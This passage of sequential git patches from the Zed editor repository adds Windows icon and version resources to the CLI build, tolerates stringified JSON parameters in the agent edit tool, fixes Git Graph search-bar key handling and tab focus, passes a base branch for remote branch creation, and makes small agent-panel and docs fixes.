embed equivalent Windows resources. As a result, Windows integrations that discover or display Zed through `bin\zed.exe` may show a missing/default application icon. This change adds Windows resource embedding to the `cli` crate and uses the same release-channel icon selection as the main Zed executable. Fixes #51154 ## Testing - Built the Windows CLI executable: ```powershell cargo build --release --package cli --target x86_64-pc-windows-msvc --locked --offline ``` - Verified `target\x86_64-pc-windows-msvc\release\cli.exe` contains: - `FileDescription = Zed` - `ProductName = Zed` - Verified the executable displays the Zed icon in Windows Explorer. - Confirmed the Windows bundling script installs `cli.exe` as `bin\zed.exe`. - Started a full Windows bundle build and confirmed it passed license generation and progressed into executable builds. The local full bundle build could not be completed because the machine is missing the VS Spectre-mitigated C++ libraries. ## Release Notes - N/A ## Notes This change is limited to Windows executable resource metadata for the CLI binary. It does not change Zed runtime behavior. --------- Co-authored-by: John Tur --- Cargo.lock | 12 +- Cargo.toml | 1 + crates/auto_update_helper/Cargo.toml | 4 +- crates/auto_update_helper/build.rs | 12 +- crates/cli/Cargo.toml | 3 + crates/cli/build.rs | 8 ++ crates/windows_resources/Cargo.toml | 16 +++ crates/windows_resources/LICENSE-GPL | 1 + .../resources}/manifest.xml | 0 .../src/windows_resources.rs | 125 ++++++++++++++++++ crates/zed/Cargo.toml | 4 +- crates/zed/build.rs | 29 +--- 12 files changed, 173 insertions(+), 42 deletions(-) create mode 100644 crates/windows_resources/Cargo.toml create mode 120000 crates/windows_resources/LICENSE-GPL rename crates/{auto_update_helper => windows_resources/resources}/manifest.xml (100%) create mode 100644 crates/windows_resources/src/windows_resources.rs diff --git a/Cargo.lock b/Cargo.lock index bd5f9f19a5517b..9bda3f999ce560 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -1268,7 +1268,7 @@ dependencies = [ "simplelog", "tempfile", "windows 0.61.3", - "winresource", + "windows_resources", ] [[package]] @@ -2946,6 +2946,7 @@ dependencies = [ "util", "walkdir", "windows 0.61.3", + "windows_resources", ] [[package]] @@ -21421,6 +21422,13 @@ version = "0.53.1" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "1e7ac75179f18232fe9c285163565a57ef8d3c89254a30685b57d83a38d326c2" +[[package]] +name = "windows_resources" +version = "0.1.0" +dependencies = [ + "embed-resource", +] + [[package]] name = "windows_x86_64_gnu" version = "0.42.2" @@ -22516,7 +22524,7 @@ dependencies = [ "web_search_providers", "which_key", "windows 0.61.3", - "winresource", + "windows_resources", "workspace", "zed-reqwest", "zed_actions", diff --git a/Cargo.toml b/Cargo.toml index cd2b8cf54c26b1..b526095e47c5eb 100644 --- a/Cargo.toml +++ b/Cargo.toml @@ -225,6 +225,7 @@ members = [ "crates/x_ai", "crates/zed", "crates/zed_actions", + "crates/windows_resources", "crates/zed_credentials_provider", "crates/zed_env_vars", "crates/zeta_prompt", diff --git a/crates/auto_update_helper/Cargo.toml b/crates/auto_update_helper/Cargo.toml index aa5bf6ac40b0e1..81c31a63c369bc 100644 --- a/crates/auto_update_helper/Cargo.toml +++ b/crates/auto_update_helper/Cargo.toml @@ -25,8 +25,8 @@ windows.workspace = true [target.'cfg(target_os = "windows")'.dev-dependencies] tempfile.workspace = true -[target.'cfg(target_os = "windows")'.build-dependencies] -winresource = "0.1" +[build-dependencies] +windows_resources = { path = "../windows_resources" } [package.metadata.docs.rs] targets = ["x86_64-pc-windows-msvc"] diff --git a/crates/auto_update_helper/build.rs b/crates/auto_update_helper/build.rs index 2910632c7ff2ff..b91bbcb4bf5d47 100644 --- a/crates/auto_update_helper/build.rs +++ b/crates/auto_update_helper/build.rs @@ -1,15 +1,9 @@ fn main() { #[cfg(target_os = "windows")] { - println!("cargo:rerun-if-changed=manifest.xml"); + println!("cargo:rerun-if-env-changed=RELEASE_CHANNEL"); + println!("cargo:rerun-if-env-changed=GITHUB_RUN_NUMBER"); - let mut res = winresource::WindowsResource::new(); - res.set_manifest_file("manifest.xml"); - res.set_icon("app-icon.ico"); - - if let Err(e) = res.compile() { - eprintln!("{}", e); - std::process::exit(1); - } + windows_resources::compile(true).expect("failed to compile Windows resources"); } } diff --git a/crates/cli/Cargo.toml b/crates/cli/Cargo.toml index cfd807c0356aa2..e8667c608753b9 100644 --- a/crates/cli/Cargo.toml +++ b/crates/cli/Cargo.toml @@ -52,3 +52,6 @@ plist = "1.3" [target.'cfg(target_os = "windows")'.dependencies] windows.workspace = true + +[build-dependencies] +windows_resources = { path = "../windows_resources" } diff --git a/crates/cli/build.rs b/crates/cli/build.rs index a3c4bc643735d0..8bda0576a078db 100644 --- a/crates/cli/build.rs +++ b/crates/cli/build.rs @@ -26,4 +26,12 @@ fn main() { if let Some(build_identifier) = option_env!("GITHUB_RUN_NUMBER") { println!("cargo:rustc-env=ZED_BUILD_ID={build_identifier}"); } + + #[cfg(windows)] + { + println!("cargo:rerun-if-env-changed=RELEASE_CHANNEL"); + println!("cargo:rerun-if-env-changed=GITHUB_RUN_NUMBER"); + + windows_resources::compile(false).expect("failed to compile Windows resources"); + } } diff --git a/crates/windows_resources/Cargo.toml b/crates/windows_resources/Cargo.toml new file mode 100644 index 00000000000000..4344040660c916 --- /dev/null +++ b/crates/windows_resources/Cargo.toml @@ -0,0 +1,16 @@ +[package] +name = "windows_resources" +version = "0.1.0" +edition.workspace = true +publish.workspace = true +license = "GPL-3.0-or-later" + +[lints] +workspace = true + +[lib] +path = "src/windows_resources.rs" +doctest = false + +[target.'cfg(target_os = "windows")'.dependencies] +embed-resource = "3.0" diff --git a/crates/windows_resources/LICENSE-GPL b/crates/windows_resources/LICENSE-GPL new file mode 120000 index 00000000000000..89e542f750cd38 --- /dev/null +++ b/crates/windows_resources/LICENSE-GPL @@ -0,0 +1 @@ +../../LICENSE-GPL \ No newline at end of file diff --git a/crates/auto_update_helper/manifest.xml b/crates/windows_resources/resources/manifest.xml similarity index 100% rename from crates/auto_update_helper/manifest.xml rename to crates/windows_resources/resources/manifest.xml diff --git a/crates/windows_resources/src/windows_resources.rs b/crates/windows_resources/src/windows_resources.rs new file mode 100644 index 00000000000000..fee3e7368bd600 --- /dev/null +++ b/crates/windows_resources/src/windows_resources.rs @@ -0,0 +1,125 @@ +#![allow( + clippy::disallowed_methods, + reason = "build helper used only from build scripts" +)] +#![cfg(target_os = "windows")] + +use std::process::Command; + +fn git_sha() -> Option { + if let Ok(sha) = std::env::var("ZED_COMMIT_SHA") { + return Some(sha); + } + + Command::new("git") + .args(["rev-parse", "HEAD"]) + .output() + .ok() + .filter(|output| output.status.success()) + .map(|output| String::from_utf8_lossy(&output.stdout).trim().to_string()) +} + +fn product_version() -> String { + let commit_sha = git_sha(); + let pkg_version = std::env::var("CARGO_PKG_VERSION").unwrap_or_default(); + let channel = std::env::var("RELEASE_CHANNEL").unwrap_or_else(|_| "dev".into()); + let build_id = std::env::var("GITHUB_RUN_NUMBER").ok(); + + let mut metadata = channel; + if let Some(build_id) = &build_id { + metadata.push('.'); + metadata.push_str(build_id); + } + if let Some(sha) = &commit_sha { + metadata.push('.'); + metadata.push_str(sha); + } + + format!("{pkg_version}+{metadata}") +} + +const ICON_DIR: &str = concat!(env!("CARGO_MANIFEST_DIR"), "/../zed/resources/windows"); +const MANIFEST_PATH: &str = concat!(env!("CARGO_MANIFEST_DIR"), "/resources/manifest.xml"); + +pub fn compile(manifest: bool) -> Result<(), Box> { + let channel = option_env!("RELEASE_CHANNEL").unwrap_or("dev"); + let (icon_filename, product_name) = match channel { + "stable" => ("app-icon.ico", "Zed"), + "preview" => ("app-icon-preview.ico", "Zed Preview"), + "nightly" => ("app-icon-nightly.ico", "Zed Nightly"), + _ => ("app-icon-dev.ico", "Zed Dev"), + }; + let icon = std::path::PathBuf::from(ICON_DIR).join(icon_filename); + let icon_escaped = icon.to_string_lossy().replace('\\', "\\\\"); + + let manifest_line = if manifest { + let escaped = MANIFEST_PATH.replace('\\', "\\\\"); + format!("1 24 \"{escaped}\"") + } else { + String::new() + }; + + let pkg_version = std::env::var("CARGO_PKG_VERSION").unwrap_or_default(); + let product_version = product_version(); + let mut version_parts = pkg_version + .split('.') + .map(|part| part.parse::().unwrap_or(0)) + .chain(std::iter::repeat(0)); + let file_version = format!( + "{},{},{},{}", + version_parts.next().unwrap_or(0), + version_parts.next().unwrap_or(0), + version_parts.next().unwrap_or(0), + version_parts.next().unwrap_or(0), + ); + + let rc_content = format!( + r#"1 ICON "{icon_escaped}" +{manifest_line} + +1 VERSIONINFO +FILEVERSION {file_version} +PRODUCTVERSION {file_version} +FILEFLAGSMASK 0x3fL +FILEFLAGS 0x0L +FILEOS 0x40004L +FILETYPE 0x1L +FILESUBTYPE 0x0L +BEGIN + BLOCK "StringFileInfo" + BEGIN + BLOCK "040904b0" + BEGIN + VALUE "FileDescription", "{product_name}\0" + VALUE "FileVersion", "{pkg_version}\0" + VALUE "ProductName", "{product_name}\0" + VALUE "ProductVersion", "{product_version}\0" + VALUE "CompanyName", "Zed Industries, Inc.\0" + VALUE "LegalCopyright", "Copyright 2022 - 2025 Zed Industries, Inc.\0" + END + END + BLOCK "VarFileInfo" + BEGIN + VALUE "Translation", 0x0409, 1200 + END +END +"# + ); + + let out_dir = std::path::PathBuf::from(std::env::var("OUT_DIR")?); + let rc_path = out_dir.join("zed_resources.rc"); + std::fs::write(&rc_path, rc_content)?; + + if let Ok(toolkit_path) = std::env::var("ZED_RC_TOOLKIT_PATH") { + let rc_exe = std::path::Path::new(&toolkit_path).join("rc.exe"); + unsafe { + std::env::set_var("RC", rc_exe); + } + } + + embed_resource::compile(&rc_path, embed_resource::NONE) + .manifest_optional() + .unwrap(); + + Ok(()) +} diff --git a/crates/zed/Cargo.toml b/crates/zed/Cargo.toml index 0374f6ec605651..d8ac8be3369f7f 100644 --- a/crates/zed/Cargo.toml +++ b/crates/zed/Cargo.toml @@ -233,8 +233,8 @@ gpui = { workspace = true, features = [ "windows-manifest", ] } -[target.'cfg(target_os = "windows")'.build-dependencies] -winresource = "0.1" +[build-dependencies] +windows_resources = { path = "../windows_resources" } [target.'cfg(any(target_os = "linux", target_os = "freebsd"))'.dependencies] gpui = { workspace = true, features = [ diff --git a/crates/zed/build.rs b/crates/zed/build.rs index 80bf1d8642e253..b27eba36a8a1dc 100644 --- a/crates/zed/build.rs +++ b/crates/zed/build.rs @@ -202,37 +202,12 @@ fn main() { } } - let release_channel = option_env!("RELEASE_CHANNEL").unwrap_or("dev"); - let icon = match release_channel { - "stable" => "resources/windows/app-icon.ico", - "preview" => "resources/windows/app-icon-preview.ico", - "nightly" => "resources/windows/app-icon-nightly.ico", - "dev" => "resources/windows/app-icon-dev.ico", - _ => "resources/windows/app-icon-dev.ico", - }; - let icon = std::path::Path::new(icon); - println!("cargo:rerun-if-env-changed=RELEASE_CHANNEL"); - println!("cargo:rerun-if-changed={}", icon.display()); + println!("cargo:rerun-if-env-changed=GITHUB_RUN_NUMBER"); #[cfg(windows)] { - let mut res = winresource::WindowsResource::new(); - - // Depending on the security applied to the computer, winresource might fail - // fetching the RC path. Therefore, we add a way to explicitly specify the - // toolkit path, allowing winresource to use a valid RC path. - if let Some(explicit_rc_toolkit_path) = std::env::var("ZED_RC_TOOLKIT_PATH").ok() { - res.set_toolkit_path(explicit_rc_toolkit_path.as_str()); - } - res.set_icon(icon.to_str().unwrap()); - res.set("FileDescription", "Zed"); - res.set("ProductName", "Zed"); - - if let Err(e) = res.compile() { - eprintln!("{}", e); - std::process::exit(1); - } + windows_resources::compile(false).expect("failed to compile Windows resources"); } } From efc90bba32d5821fbdafb763238b186c8fb1d98c Mon Sep 17 00:00:00 2001 From: Agus Zubiaga Date: Sat, 2 May 2026 18:11:10 +0200 Subject: [PATCH 132/231] edit tool: Support stringified `mode` parameter (#55498) Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Release Notes: - N/A --- .../src/tools/streaming_edit_file_tool.rs | 106 ++++++++++++++---- 1 file changed, 83 insertions(+), 23 deletions(-) diff --git a/crates/agent/src/tools/streaming_edit_file_tool.rs b/crates/agent/src/tools/streaming_edit_file_tool.rs index 5f6d51ee2bb5c1..4cd08b2311a2ef 100644 --- a/crates/agent/src/tools/streaming_edit_file_tool.rs +++ b/crates/agent/src/tools/streaming_edit_file_tool.rs @@ -84,6 +84,7 @@ pub struct StreamingEditFileToolInput { /// - 'edit': Make granular edits to an existing file. Requires 'edits' field. /// /// When a file already exists or you just created it, prefer editing it as opposed to recreating it from scratch. + #[serde(deserialize_with = "deserialize_maybe_stringified")] pub mode: StreamingEditFileMode, /// The complete content for the new file (required for 'write' mode). @@ -96,7 +97,7 @@ pub struct StreamingEditFileToolInput { #[serde( default, skip_serializing_if = "Option::is_none", - deserialize_with = "deserialize_optional_vec_or_json_string" + deserialize_with = "deserialize_maybe_stringified" )] pub edits: Option>, } @@ -133,11 +134,11 @@ struct StreamingEditFileToolPartialInput { display_description: Option, #[serde(default)] path: Option, - #[serde(default)] + #[serde(default, deserialize_with = "deserialize_maybe_stringified")] mode: Option, #[serde(default)] content: Option, - #[serde(default, deserialize_with = "deserialize_optional_vec_or_json_string")] + #[serde(default, deserialize_with = "deserialize_maybe_stringified")] edits: Option>, } @@ -149,30 +150,23 @@ pub struct PartialEdit { pub new_text: Option, } -/// Sometimes the model responds with a stringified JSON array of edits (`"[...]"`) instead of a regular array (`[...]`) -fn deserialize_optional_vec_or_json_string<'de, T, D>( - deserializer: D, -) -> Result>, D::Error> +#[derive(Deserialize)] +#[serde(untagged)] +enum ValueOrJsonString { + Value(T), + String(String), +} + +fn deserialize_maybe_stringified<'de, T, D>(deserializer: D) -> Result where T: DeserializeOwned, D: Deserializer<'de>, { - #[derive(Deserialize)] - #[serde(untagged)] - enum VecOrJsonString { - Vec(Vec), - String(String), - } - - let value = Option::>::deserialize(deserializer)?; - match value { - None => Ok(None), - Some(VecOrJsonString::Vec(items)) => Ok(Some(items)), - Some(VecOrJsonString::String(string)) => serde_json::from_str::>(&string) - .map(Some) - .map_err(|error| { - D::Error::custom(format!("failed to parse stringified edits array: {error}")) - }), + match ValueOrJsonString::::deserialize(deserializer)? { + ValueOrJsonString::Value(value) => Ok(value), + ValueOrJsonString::String(string) => serde_json::from_str::(&string).map_err(|error| { + D::Error::custom(format!("failed to parse stringified value: {error}")) + }), } } @@ -4180,6 +4174,72 @@ mod tests { ); } + #[test] + fn test_input_deserializes_double_encoded_fields() { + let input = serde_json::from_value::(json!({ + "display_description": "Edit", + "path": "root/file.txt", + "mode": "\"edit\"", + "edits": "[{\"old_text\": \"hello\\nworld\", \"new_text\": \"HELLO\\nWORLD\"}]" + })) + .expect("input should deserialize"); + + assert!(matches!(input.mode, StreamingEditFileMode::Edit)); + let edits = input.edits.expect("edits should deserialize"); + assert_eq!(edits.len(), 1); + assert_eq!(edits[0].old_text, "hello\nworld"); + assert_eq!(edits[0].new_text, "HELLO\nWORLD"); + + let input = serde_json::from_value::(json!({ + "display_description": "Edit", + "path": "root/file.txt", + "mode": "\"edit\"" + })) + .expect("input should deserialize"); + assert!(input.edits.is_none()); + + let input = serde_json::from_value::(json!({ + "display_description": "Edit", + "path": "root/file.txt", + "mode": "\"edit\"", + "edits": null + })) + .expect("input should deserialize"); + assert!(input.edits.is_none()); + + let input = serde_json::from_value::(json!({ + "display_description": "Edit", + "path": "root/file.txt", + "mode": "\"edit\"", + "edits": "[{\"old_text\": \"hello\\nworld\", \"new_text\": \"HELLO\\nWORLD\"}]" + })) + .expect("input should deserialize"); + + assert!(matches!(input.mode, Some(StreamingEditFileMode::Edit))); + let edits = input.edits.expect("edits should deserialize"); + assert_eq!(edits.len(), 1); + assert_eq!(edits[0].old_text.as_deref(), Some("hello\nworld")); + assert_eq!(edits[0].new_text.as_deref(), Some("HELLO\nWORLD")); + + let input = serde_json::from_value::(json!({ + "display_description": "Edit", + "path": "root/file.txt" + })) + .expect("input should deserialize"); + assert!(input.mode.is_none()); + assert!(input.edits.is_none()); + + let input = serde_json::from_value::(json!({ + "display_description": "Edit", + "path": "root/file.txt", + "mode": null, + "edits": null + })) + .expect("input should deserialize"); + assert!(input.mode.is_none()); + assert!(input.edits.is_none()); + } + async fn setup_test_with_fs( cx: &mut TestAppContext, fs: Arc, From c86ad4f3559b5b6fae7f736a2b91dcfec16d3c49 Mon Sep 17 00:00:00 2001 From: Anthony Eid <56899983+Anthony-Eid@users.noreply.github.com> Date: Sat, 2 May 2026 22:50:51 +0200 Subject: [PATCH 133/231] git_graph: Fix search bar Vim key handling (#55510) #53609 introduced a regression where Git Graph keybindings could take precedence over the search bar. As a result, typing characters like `j` or `k` in the search field could move the table selection instead of updating the search query. This PR fixes that regression by scoping Vim table navigation bindings away from the search bar. It also adds dedicated `tab` and `shift-tab` handling for Git Graph focus traversal, with the search bar and graph table participating as separate tab groups. Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [ ] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Release Notes: - N/A --- assets/keymaps/default-linux.json | 14 ++++++ assets/keymaps/default-macos.json | 14 ++++++ assets/keymaps/default-windows.json | 14 ++++++ assets/keymaps/vim.json | 14 ++++++ crates/editor/src/editor.rs | 4 ++ crates/git_graph/src/git_graph.rs | 68 +++++++++++++++++++++++++++-- 6 files changed, 125 insertions(+), 3 deletions(-) diff --git a/assets/keymaps/default-linux.json b/assets/keymaps/default-linux.json index ba7f514766ee55..66f527ef0244d6 100644 --- a/assets/keymaps/default-linux.json +++ b/assets/keymaps/default-linux.json @@ -1536,4 +1536,18 @@ "ctrl-shift-backspace": "worktree_picker::DeleteWorktree", }, }, + { + "context": "GitGraph", + "bindings": { + "tab": "git_graph::FocusNextTabStop", + "shift-tab": "git_graph::FocusPreviousTabStop", + }, + }, + { + "context": "GitGraphSearchBar > Editor", + "bindings": { + "tab": "git_graph::FocusNextTabStop", + "shift-tab": "git_graph::FocusPreviousTabStop", + }, + }, ] diff --git a/assets/keymaps/default-macos.json b/assets/keymaps/default-macos.json index 11750aa74148e7..8e115985db8d92 100644 --- a/assets/keymaps/default-macos.json +++ b/assets/keymaps/default-macos.json @@ -1627,4 +1627,18 @@ "escape": "notebook::EnterCommandMode", }, }, + { + "context": "GitGraph", + "bindings": { + "tab": "git_graph::FocusNextTabStop", + "shift-tab": "git_graph::FocusPreviousTabStop", + }, + }, + { + "context": "GitGraphSearchBar > Editor", + "bindings": { + "tab": "git_graph::FocusNextTabStop", + "shift-tab": "git_graph::FocusPreviousTabStop", + }, + }, ] diff --git a/assets/keymaps/default-windows.json b/assets/keymaps/default-windows.json index 2526a9412c6775..9ac7ed46cfd737 100644 --- a/assets/keymaps/default-windows.json +++ b/assets/keymaps/default-windows.json @@ -1553,4 +1553,18 @@ "escape": "notebook::EnterCommandMode", }, }, + { + "context": "GitGraph", + "bindings": { + "tab": "git_graph::FocusNextTabStop", + "shift-tab": "git_graph::FocusPreviousTabStop", + }, + }, + { + "context": "GitGraphSearchBar > Editor", + "bindings": { + "tab": "git_graph::FocusNextTabStop", + "shift-tab": "git_graph::FocusPreviousTabStop", + }, + }, ] diff --git a/assets/keymaps/vim.json b/assets/keymaps/vim.json index 188ea2e483a65d..6e52ac3ce63b9d 100644 --- a/assets/keymaps/vim.json +++ b/assets/keymaps/vim.json @@ -1035,6 +1035,20 @@ }, { "context": "GitGraph", + "bindings": { + "tab": "git_graph::FocusNextTabStop", + "shift-tab": "git_graph::FocusPreviousTabStop", + }, + }, + { + "context": "GitGraphSearchBar > Editor", + "bindings": { + "tab": "git_graph::FocusNextTabStop", + "shift-tab": "git_graph::FocusPreviousTabStop", + }, + }, + { + "context": "GitGraph && !GitGraphSearchBar", "bindings": { "j": "vim::MenuSelectNext", "k": "vim::MenuSelectPrevious", diff --git a/crates/editor/src/editor.rs b/crates/editor/src/editor.rs index e523ae27032284..c625a3b97af1a3 100644 --- a/crates/editor/src/editor.rs +++ b/crates/editor/src/editor.rs @@ -3536,6 +3536,10 @@ impl Editor { cx.notify(); } + pub fn show_cursor(&mut self, cx: &mut Context) { + self.blink_manager.update(cx, BlinkManager::show_cursor); + } + pub fn cursor_shape(&self) -> CursorShape { self.cursor_shape } diff --git a/crates/git_graph/src/git_graph.rs b/crates/git_graph/src/git_graph.rs index e92204c5f12fd0..1f7d4b886619cf 100644 --- a/crates/git_graph/src/git_graph.rs +++ b/crates/git_graph/src/git_graph.rs @@ -282,6 +282,10 @@ actions!( OpenCommitView, /// Focuses the search field. FocusSearch, + /// Focuses the next git graph tab stop. + FocusNextTabStop, + /// Focuses the previous git graph tab stop. + FocusPreviousTabStop, ] ); @@ -1110,7 +1114,11 @@ impl GitGraph { editor }); - let table_interaction_state = cx.new(|cx| TableInteractionState::new(cx)); + let table_interaction_state = cx.new(|cx| { + let mut state = TableInteractionState::new(cx); + state.focus_handle = state.focus_handle.tab_index(1).tab_stop(true); + state + }); let column_widths = if matches!(log_source, LogSource::Path(_)) { cx.new(|_cx| { @@ -1602,6 +1610,39 @@ impl GitGraph { self.search(query, cx); } + fn activate_search_editor_if_focused(&self, window: &mut Window, cx: &mut Context) { + self.search_state.editor.update(cx, |editor, cx| { + if editor.is_focused(window) { + editor.select_all(&Default::default(), window, cx); + editor.show_cursor(cx); + } + }); + } + + fn focus_next_tab_stop( + &mut self, + _: &FocusNextTabStop, + window: &mut Window, + cx: &mut Context, + ) { + window.focus_next(cx); + self.activate_search_editor_if_focused(window, cx); + cx.stop_propagation(); + cx.notify(); + } + + fn focus_previous_tab_stop( + &mut self, + _: &FocusPreviousTabStop, + window: &mut Window, + cx: &mut Context, + ) { + window.focus_prev(cx); + self.activate_search_editor_if_focused(window, cx); + cx.stop_propagation(); + cx.notify(); + } + fn select_entry( &mut self, idx: usize, @@ -1783,7 +1824,12 @@ impl GitGraph { fn render_search_bar(&self, cx: &mut Context) -> impl IntoElement { let color = cx.theme().colors(); - let query_focus_handle = self.search_state.editor.focus_handle(cx); + let query_focus_handle = self + .search_state + .editor + .focus_handle(cx) + .tab_index(1) + .tab_stop(true); let search_options = { let mut options = SearchOptions::NONE; options.set( @@ -1794,6 +1840,10 @@ impl GitGraph { }; h_flex() + .key_context("GitGraphSearchBar") + .tab_index(1) + .tab_group() + .tab_stop(false) .w_full() .p_1p5() .gap_1p5() @@ -1806,6 +1856,7 @@ impl GitGraph { .min_w_0() .px_1p5() .gap_1() + .track_focus(&query_focus_handle) .border_1() .border_color(color.border_variant) .rounded_md() @@ -2811,6 +2862,8 @@ impl Render for GitGraph { let hovered_entry_idx = self.hovered_entry_idx; let weak_self = cx.weak_entity(); let focus_handle = self.focus_handle.clone(); + let table_focus_handle = + self.table_interaction_state.read(cx).focus_handle.clone(); let graph_canvas = div() .id("graph-canvas") @@ -2840,7 +2893,9 @@ impl Render for GitGraph { .map_row(move |(index, row), window, cx| { let is_selected = selected_entry_idx == Some(index); let is_hovered = hovered_entry_idx == Some(index); - let is_focused = focus_handle.is_focused(window); + let table_focus_handle = table_focus_handle.clone(); + let is_focused = focus_handle.is_focused(window) + || table_focus_handle.is_focused(window); let weak = weak_self.clone(); let weak_for_hover = weak.clone(); @@ -2873,6 +2928,7 @@ impl Render for GitGraph { }) .on_click(move |event, window, cx| { let click_count = event.click_count(); + table_focus_handle.focus(window, cx); weak.update(cx, |this, cx| { this.select_entry( index, @@ -2914,6 +2970,9 @@ impl Render for GitGraph { }) .child( div() + .tab_index(2) + .tab_group() + .tab_stop(false) .w(DefiniteLength::Fraction(table_fraction)) .h_full() .min_w_0() @@ -2958,12 +3017,15 @@ impl Render for GitGraph { this.search_state .editor .update(cx, |editor, cx| editor.focus_handle(cx).focus(window, cx)); + this.activate_search_editor_if_focused(window, cx); })) .on_action(cx.listener(Self::select_first)) .on_action(cx.listener(Self::select_prev)) .on_action(cx.listener(Self::select_next)) .on_action(cx.listener(Self::select_last)) .on_action(cx.listener(Self::confirm)) + .on_action(cx.listener(Self::focus_next_tab_stop)) + .on_action(cx.listener(Self::focus_previous_tab_stop)) .on_action(cx.listener(|this, _: &SelectNextMatch, _window, cx| { this.select_next_match(cx); })) From 78e5ceff35b08bdd26af6b338c81d779f9f87a26 Mon Sep 17 00:00:00 2001 From: boaz-h <63008204+boaz-h@users.noreply.github.com> Date: Sun, 3 May 2026 01:26:50 +0300 Subject: [PATCH 134/231] Fix creating branch with base in remote (#55387) To support branch create with base branch, added extra optional field in GitCreateBranch proto. Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Closes #43985 Release Notes: - git: Fixed remote branch creation based on default branch --- crates/project/src/git_store.rs | 4 +++- crates/proto/proto/git.proto | 1 + 2 files changed, 4 insertions(+), 1 deletion(-) diff --git a/crates/project/src/git_store.rs b/crates/project/src/git_store.rs index 8956345c68ef82..b30b943d032737 100644 --- a/crates/project/src/git_store.rs +++ b/crates/project/src/git_store.rs @@ -2753,10 +2753,11 @@ impl GitStore { let repository_id = RepositoryId::from_proto(envelope.payload.repository_id); let repository_handle = Self::repository_for_request(&this, repository_id, &mut cx)?; let branch_name = envelope.payload.branch_name; + let base_branch = envelope.payload.base_branch; repository_handle .update(&mut cx, |repository_handle, _| { - repository_handle.create_branch(branch_name, None) + repository_handle.create_branch(branch_name, base_branch) }) .await??; @@ -7033,6 +7034,7 @@ impl Repository { project_id: project_id.0, repository_id: id.to_proto(), branch_name, + base_branch, }) .await?; diff --git a/crates/proto/proto/git.proto b/crates/proto/proto/git.proto index 9d583a166c95f7..cea288ea2a0b7a 100644 --- a/crates/proto/proto/git.proto +++ b/crates/proto/proto/git.proto @@ -180,6 +180,7 @@ message GitCreateBranch { reserved 2; uint64 repository_id = 3; string branch_name = 4; + optional string base_branch = 5; } message GitChangeBranch { From 6cf062f6e1cb147d579ba1c00a406c36b74323aa Mon Sep 17 00:00:00 2001 From: Anthony Eid <56899983+Anthony-Eid@users.noreply.github.com> Date: Sun, 3 May 2026 00:30:18 +0200 Subject: [PATCH 135/231] agent_panel: Keep current title name when generating new title (#55512) When generating a title we replace the title text of the agent panel with a hard coded "New Agent Thread" title, even when a title already exists. This PR uses the pre existing title name as a place holder during title generating instead of the hard coded value. Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Release Notes: - N/A or Added/Fixed/Improved ... --- crates/agent_ui/src/agent_panel.rs | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/crates/agent_ui/src/agent_panel.rs b/crates/agent_ui/src/agent_panel.rs index e52e82120a2e49..8285da9e113e92 100644 --- a/crates/agent_ui/src/agent_panel.rs +++ b/crates/agent_ui/src/agent_panel.rs @@ -29,7 +29,6 @@ use zed_actions::{ assistant::{FocusAgent, OpenRulesLibrary, Toggle, ToggleFocus}, }; -use crate::DEFAULT_THREAD_TITLE; use crate::ExpandMessageEditor; use crate::ManageProfiles; use crate::agent_connection_store::AgentConnectionStore; @@ -2691,7 +2690,7 @@ impl AgentPanel { .map(|r| r.read(cx).title_editor.clone()) { if is_generating_title { - Label::new(DEFAULT_THREAD_TITLE) + Label::new(server_view_ref.title(cx)) .color(Color::Muted) .truncate() .with_animation( From fb0140336a73b6f163f836ad5fc3284c34869fef Mon Sep 17 00:00:00 2001 From: raptor Date: Sun, 3 May 2026 16:30:09 +0200 Subject: [PATCH 136/231] docs: Remove invalid `preferred_line_length` option value from `soft_wrap` (#55538) This PR updates the documentation to remove the no longer valid `preferred_line_length` option value from `soft_wrap`. Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Release Notes: - N/A --- docs/src/reference/all-settings.md | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/docs/src/reference/all-settings.md b/docs/src/reference/all-settings.md index f175d51a398d63..eb4ccd1259ea4e 100644 --- a/docs/src/reference/all-settings.md +++ b/docs/src/reference/all-settings.md @@ -3932,8 +3932,7 @@ Positive integer values 1. `none` to avoid wrapping generally, unless the line is too long 2. `prefer_line` (deprecated, same as `none`) 3. `editor_width` to wrap lines that overflow the editor width -4. `preferred_line_length` to wrap lines that overflow `preferred_line_length` config value -5. `bounded` to wrap lines at the minimum of `editor_width` and `preferred_line_length` +4. `bounded` to wrap lines at the minimum of `editor_width` and `preferred_line_length` ## Show Wrap Guides From cd213546e0a1619a09c530aca62a03fc1dcd1377 Mon Sep 17 00:00:00 2001 From: Marshall Bowers Date: Sun, 3 May 2026 17:33:50 +0200 Subject: [PATCH 137/231] collab: Simplify contributor setup in `test_channel_requires_zed_cla` (#55558) This PR updates the `test_channel_requires_zed_cla` test to simplify the setup for denoting that a user has signed the CLA. Since the user already exists in the database, we can just create the corresponding record without needing to worry about upserting. Release Notes: - N/A --- crates/collab/src/db/queries/contributors.rs | 24 ++----------------- .../tests/integration/channel_guest_tests.rs | 18 